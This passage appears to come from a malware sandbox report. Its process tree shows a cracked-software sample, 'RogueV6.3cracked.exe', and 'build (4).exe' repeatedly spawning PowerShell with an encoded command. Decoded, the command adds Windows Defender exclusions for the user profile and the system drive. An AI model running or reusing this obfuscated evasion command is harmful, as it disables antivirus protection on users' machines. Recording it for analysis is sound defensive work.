        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        191⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        191⤵
        
        PID:6472
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        191⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        192⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        192⤵
        
        PID:6660
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        192⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        193⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        193⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        193⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        194⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        194⤵
        
        PID:5356
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        194⤵
        
        PID:6240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        195⤵
        
        PID:5576
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        195⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        195⤵
        
        PID:6284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        196⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        196⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        196⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        197⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        197⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        197⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        198⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        198⤵
        
        PID:6172
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        198⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        199⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        199⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        199⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        200⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        200⤵
        
        PID:6468
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        200⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        201⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        201⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        201⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        202⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        202⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        202⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        203⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        203⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        203⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        204⤵
        
        PID:6288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        204⤵
        
        PID:6388
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        204⤵
        
        PID:6048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        205⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        205⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        205⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        206⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        206⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        206⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        207⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        207⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        207⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        208⤵
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        208⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        208⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        209⤵
        
        PID:5556
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        209⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        209⤵
        
        PID:6688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        210⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        210⤵
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        210⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        211⤵
        
        PID:6412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        211⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        211⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        212⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        212⤵
        
        PID:7196
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        212⤵
        
        PID:7220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        213⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        213⤵
        
        PID:7300
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        213⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        214⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        214⤵
        
        PID:7444
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        214⤵
        
        PID:7484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        215⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        215⤵
        
        PID:7556
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        215⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        216⤵
        
        PID:7668
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        216⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        216⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        217⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        217⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        217⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
